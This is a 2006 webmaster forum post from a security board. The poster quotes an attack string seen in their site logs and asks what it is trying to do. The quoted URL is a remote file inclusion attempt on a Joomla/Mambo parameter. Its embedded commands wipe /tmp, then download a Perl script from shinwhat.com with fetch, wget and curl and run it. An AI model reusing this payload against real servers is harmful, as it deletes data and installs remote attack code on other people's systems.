1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

Security Issue: Attempts FROM: shinwhat.com

Discussion in 'Security' started by aeronautic.net, Jun 25, 2006.

  1. #1
    I've been seeing dozens of hits to various urls on one of my sites from IPs all over the world in the past few days constructed like this string:

    http://A-SNIPPEDDOMAINDOTCOM/SNIPPEDPATH/SNIPPED/index.php?
    _REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=
    http://www.shinwhat.com/cms/tool.gif?&cmd=cd%20/tmp/;rm%20-rf%20*;fetch%20http://www.shinwhat.com/cms/bt.pl;
    wget%20http://www.shinwhat.com/cms/bt.pl;curl%20-O%20http://www.shinwhat.com/cms/bt.pl;
    perl%20bt.pl;perl%20bt.pl.1;perl%20bt.pl.2?
    Code (markup):
    All contain that reference to shinwhat.com

    Yes, I've written them but the hits keep coming. They are just kicking 403s but I'd like to know what this script (zombie?) is trying to pull off.
    SEMrush
    Any ideas?

    Thanks!
     
    aeronautic.net, Jun 25, 2006 IP
    SEMrush